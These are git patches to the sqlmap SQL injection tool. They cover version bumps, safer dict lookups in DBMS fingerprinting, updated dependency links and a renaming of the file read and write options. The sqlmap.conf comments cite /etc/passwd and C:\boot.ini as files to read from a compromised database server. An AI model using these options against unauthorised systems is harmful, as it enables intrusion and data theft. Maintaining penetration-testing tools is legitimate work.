plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py From d6cf038e48846681b8b533c22cc25885069ee343 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 25 Aug 2018 22:57:49 +0200 Subject: [PATCH 238/428] Fixes #3216 --- lib/core/settings.py | 2 +- plugins/dbms/access/fingerprint.py | 2 +- plugins/dbms/db2/fingerprint.py | 2 +- plugins/dbms/firebird/fingerprint.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 2 +- plugins/dbms/informix/fingerprint.py | 2 +- plugins/dbms/mssqlserver/fingerprint.py | 6 +++--- plugins/dbms/mysql/fingerprint.py | 2 +- plugins/dbms/oracle/fingerprint.py | 2 +- plugins/dbms/postgresql/fingerprint.py | 2 +- plugins/dbms/sqlite/fingerprint.py | 2 +- plugins/dbms/sybase/fingerprint.py | 2 +- txt/checksum.md5 | 24 ++++++++++++------------ 13 files changed, 26 insertions(+), 26 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2ee193f5e08..7e7ff864554 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.15" +VERSION = "1.2.8.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 5c6896dc598..ca44557bef1 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -129,7 +129,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") if re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index 6a584b8a9c3..364e89d31af 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -68,7 +68,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index f63a57f49ce..a8f5d7fc92c 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -50,7 +50,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") if re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index f6a9aa65992..fcad249f917 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -47,7 +47,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") if re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py index 8c7e15252b4..e6ca564821c 100644 --- a/plugins/dbms/informix/fingerprint.py +++ b/plugins/dbms/informix/fingerprint.py @@ -44,7 +44,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index f5a5af27ea8..5fbf73680af 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -46,9 +46,9 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None - version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None + release = kb.bannerFp.get("dbmsRelease") + version = kb.bannerFp.get("dbmsVersion") + servicepack = kb.bannerFp.get("dbmsServicePack") if release and version and servicepack: banVer = "%s %s " % (DBMS.MSSQL, release) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index ac9eabd967b..89ea5c8ee09 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -124,7 +124,7 @@ def getFingerprint(self): value += "\n%scomment injection fingerprint: %s" % (blank, comVer) if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if "dbmsVersion" in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") if banVer and re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 22a8a6968e5..692d26fb1d9 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -46,7 +46,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 0e577de4e4a..5860b820906 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -45,7 +45,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 109c7d6b399..abaeeb2cb64 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -45,7 +45,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index a8d707d0fac..5fda220b8ba 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -46,7 +46,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3de69dd1d81..b45f67f62e5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3dfc00af3de897fbe62c6b2d5a397c13 lib/core/settings.py +b5b936aa2f5ea4aa28d66e924ef1dba9 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -121,35 +121,35 @@ e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py -c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py +cdd082981b421248ece0e7cf278071ff plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py 8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py 4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py +ce434fc05a7ad236c49a155d62f0cac4 plugins/dbms/db2/fingerprint.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py 53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py -bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py +bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py +aabc2b877a3696b99912bdf362c0fb69 plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py 97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py -35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py +b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py 9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py @@ -164,42 +164,42 @@ bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py -08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py +6cf74341fc84588205e02b70b2f0f5b6 plugins/dbms/mssqlserver/fingerprint.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py -4e23494d0a8f41c22ec3861fb404e9f7 plugins/dbms/mysql/fingerprint.py +34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py -538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py +85a5d474faaf14df5a5a84c9f232c1d6 plugins/dbms/oracle/fingerprint.py 9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py 5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -d30806e39996e6d273f0af888f5710a4 plugins/dbms/postgresql/fingerprint.py +c490b23b19e40e15cfbdbb026386bbd7 plugins/dbms/postgresql/fingerprint.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py 80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py 5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py 90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py -ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py +9b1f236857b8a64750e8662be21abb69 plugins/dbms/sqlite/fingerprint.py f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py 426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py -c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py +0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py From 2280f3ff2d700092d12fbad12e6f0135cc94a33f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 28 Aug 2018 14:13:48 +0200 Subject: [PATCH 239/428] Updating old links --- lib/core/settings.py | 2 +- lib/utils/deps.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7e7ff864554..2e3d9cb12d5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.16" +VERSION = "1.2.8.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/deps.py b/lib/utils/deps.py index e2ea0aa9b5f..937a21c8cce 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -65,7 +65,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "'http://code.google.com/p/impacket/'" + warnMsg += "'https://github.com/coresecurity/impacket'" logger.warn(warnMsg) missing_libraries.add('python-impacket') @@ -76,7 +76,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-ntlm' third-party library " warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from 'http://code.google.com/p/python-ntlm/'" + warnMsg += "authentication. Download from 'https://github.com/mullender/python-ntlm'" logger.warn(warnMsg) missing_libraries.add('python-ntlm') @@ -101,7 +101,7 @@ def checkDependencies(): warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " - warnMsg += "'http://ipython.scipy.org/moin/PyReadline/Intro'" + warnMsg += "'https://pypi.org/project/pyreadline/'" logger.warn(warnMsg) missing_libraries.add('python-pyreadline') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b45f67f62e5..b6e6815a694 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b5b936aa2f5ea4aa28d66e924ef1dba9 lib/core/settings.py +780178e74a59e86cfd73135528686abd lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -103,7 +103,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py -de9620f03231d8329ee8434884b6bacd lib/utils/deps.py +f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py From f3f4a4cb3794219503f42b48b773d8228e39ff8a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 28 Aug 2018 14:31:20 +0200 Subject: [PATCH 240/428] Minor refactoring --- lib/controller/action.py | 8 ++++---- lib/core/option.py | 26 +++++++++++++------------- lib/core/optiondict.py | 6 +++--- lib/core/settings.py | 4 ++-- lib/core/target.py | 2 +- lib/parse/cmdline.py | 6 +++--- lib/takeover/udf.py | 2 +- sqlmap.conf | 6 +++--- txt/checksum.md5 | 14 +++++++------- 9 files changed, 37 insertions(+), 37 deletions(-) diff --git a/lib/controller/action.py b/lib/controller/action.py index a05e8f7f4ed..a4de8dffdc3 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -140,11 +140,11 @@ def action(): conf.dbmsHandler.udfInjectCustom() # File system options - if conf.rFile: - conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile)) + if conf.fileRead: + conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead)) - if conf.wFile: - conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType) + if conf.fileWrite: + conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType) # Operating system options if conf.osCmd: diff --git a/lib/core/option.py b/lib/core/option.py index 502a7910117..9e70fb8da9d 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -608,22 +608,22 @@ def _(key, value): raise SqlmapFilePathException(errMsg) def _setWriteFile(): - if not conf.wFile: + if not conf.fileWrite: return debugMsg = "setting the write file functionality" logger.debug(debugMsg) - if not os.path.exists(conf.wFile): - errMsg = "the provided local file '%s' does not exist" % conf.wFile + if not os.path.exists(conf.fileWrite): + errMsg = "the provided local file '%s' does not exist" % conf.fileWrite raise SqlmapFilePathException(errMsg) - if not conf.dFile: + if not conf.fileDest: errMsg = "you did not provide the back-end DBMS absolute path " - errMsg += "where you want to write the local file '%s'" % conf.wFile + errMsg += "where you want to write the local file '%s'" % conf.fileWrite raise SqlmapMissingMandatoryOptionException(errMsg) - conf.wFileType = getFileType(conf.wFile) + conf.fileWriteType = getFileType(conf.fileWrite) def _setOS(): """ @@ -1509,14 +1509,14 @@ def _cleanupOptions(): if conf.url: conf.url = conf.url.strip() - if conf.rFile: - conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile)) + if conf.fileRead: + conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead)) - if conf.wFile: - conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile)) + if conf.fileWrite: + conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite)) - if conf.dFile: - conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile)) + if conf.fileDest: + conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest)) if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"): conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl) @@ -1699,7 +1699,7 @@ def _setConfAttributes(): conf.tests = [] conf.trafficFP = None conf.HARCollectorFactory = None - conf.wFileType = None + conf.fileWriteType = None def _setKnowledgeBaseAttributes(flushAll=True): """ diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 10c5b2c8e73..6528e5cf30e 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -165,9 +165,9 @@ }, "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", + "fileRead": "string", + "fileWrite": "string", + "fileDest": "string", }, "Takeover": { diff --git a/lib/core/settings.py b/lib/core/settings.py index 2e3d9cb12d5..22ac274019b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.17" +VERSION = "1.2.8.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -367,7 +367,7 @@ SENSITIVE_DATA_REGEX = r"(\s|=)(?P[^\s=]*%s[^\s]*)\s" # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) -SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") +SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred") # Maximum number of threads (avoiding connection issues and/or DoS) MAX_NUMBER_OF_THREADS = 10 diff --git a/lib/core/target.py b/lib/core/target.py index 43e153e1e01..4691cec83e9 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -571,7 +571,7 @@ def _createFilesDir(): Create the file directory. """ - if not conf.rFile: + if not conf.fileRead: return conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b255b9da138..24dfa7d6b59 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -471,13 +471,13 @@ def cmdLineParser(argv=None): # File system options filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system") - filesystem.add_option("--file-read", dest="rFile", + filesystem.add_option("--file-read", dest="fileRead", help="Read a file from the back-end DBMS file system") - filesystem.add_option("--file-write", dest="wFile", + filesystem.add_option("--file-write", dest="fileWrite", help="Write a local file on the back-end DBMS file system") - filesystem.add_option("--file-dest", dest="dFile", + filesystem.add_option("--file-dest", dest="fileDest", help="Back-end DBMS absolute filepath to write to") # Takeover options diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index ed0ad2c4167..7e2d46dd2e0 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -108,7 +108,7 @@ def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): return output def udfCheckNeeded(self): - if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: + if (not conf.fileRead or (conf.fileRead and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: self.sysUdfs.pop("sys_fileread") if not conf.osPwn: diff --git a/sqlmap.conf b/sqlmap.conf index 962651c57ff..b81fa51f47b 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -579,15 +579,15 @@ shLib = # Read a specific file from the back-end DBMS underlying file system. # Examples: /etc/passwd or C:\boot.ini -rFile = +fileRead = # Write a local file to a specific path on the back-end DBMS underlying # file system. # Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt -wFile = +fileWrite = # Back-end DBMS absolute filepath to write the file to. -dFile = +fileDest = # These options can be used to access the back-end database management diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b6e6815a694..322cb77972f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py -0f581182871148b0456a691ae85b04c0 lib/controller/action.py +3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py bc3800ec099df253968b3a7fc1ffce44 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py @@ -40,18 +40,18 @@ ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -05f72baa2db4073bb0273d7fc1df13eb lib/core/optiondict.py -8e759d4c8711a5980d4bdc2d044a4fd4 lib/core/option.py +7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py +6826030069e1cd88eb87603a50b2d251 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -780178e74a59e86cfd73135528686abd lib/core/settings.py +85751568ce17296e01728f4e8041e13b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py +815d1cf27f0f8738d81531e73149867d lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -59,7 +59,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -babf5c48bc6a3797fc459706af4465cd lib/parse/cmdline.py +7b2a20d7f149cc2522275e5df23bdc54 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -86,7 +86,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py -48575dde7bb867b7937769f569a98309 lib/takeover/udf.py +6a49f359b922df0247eb236126596336 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py 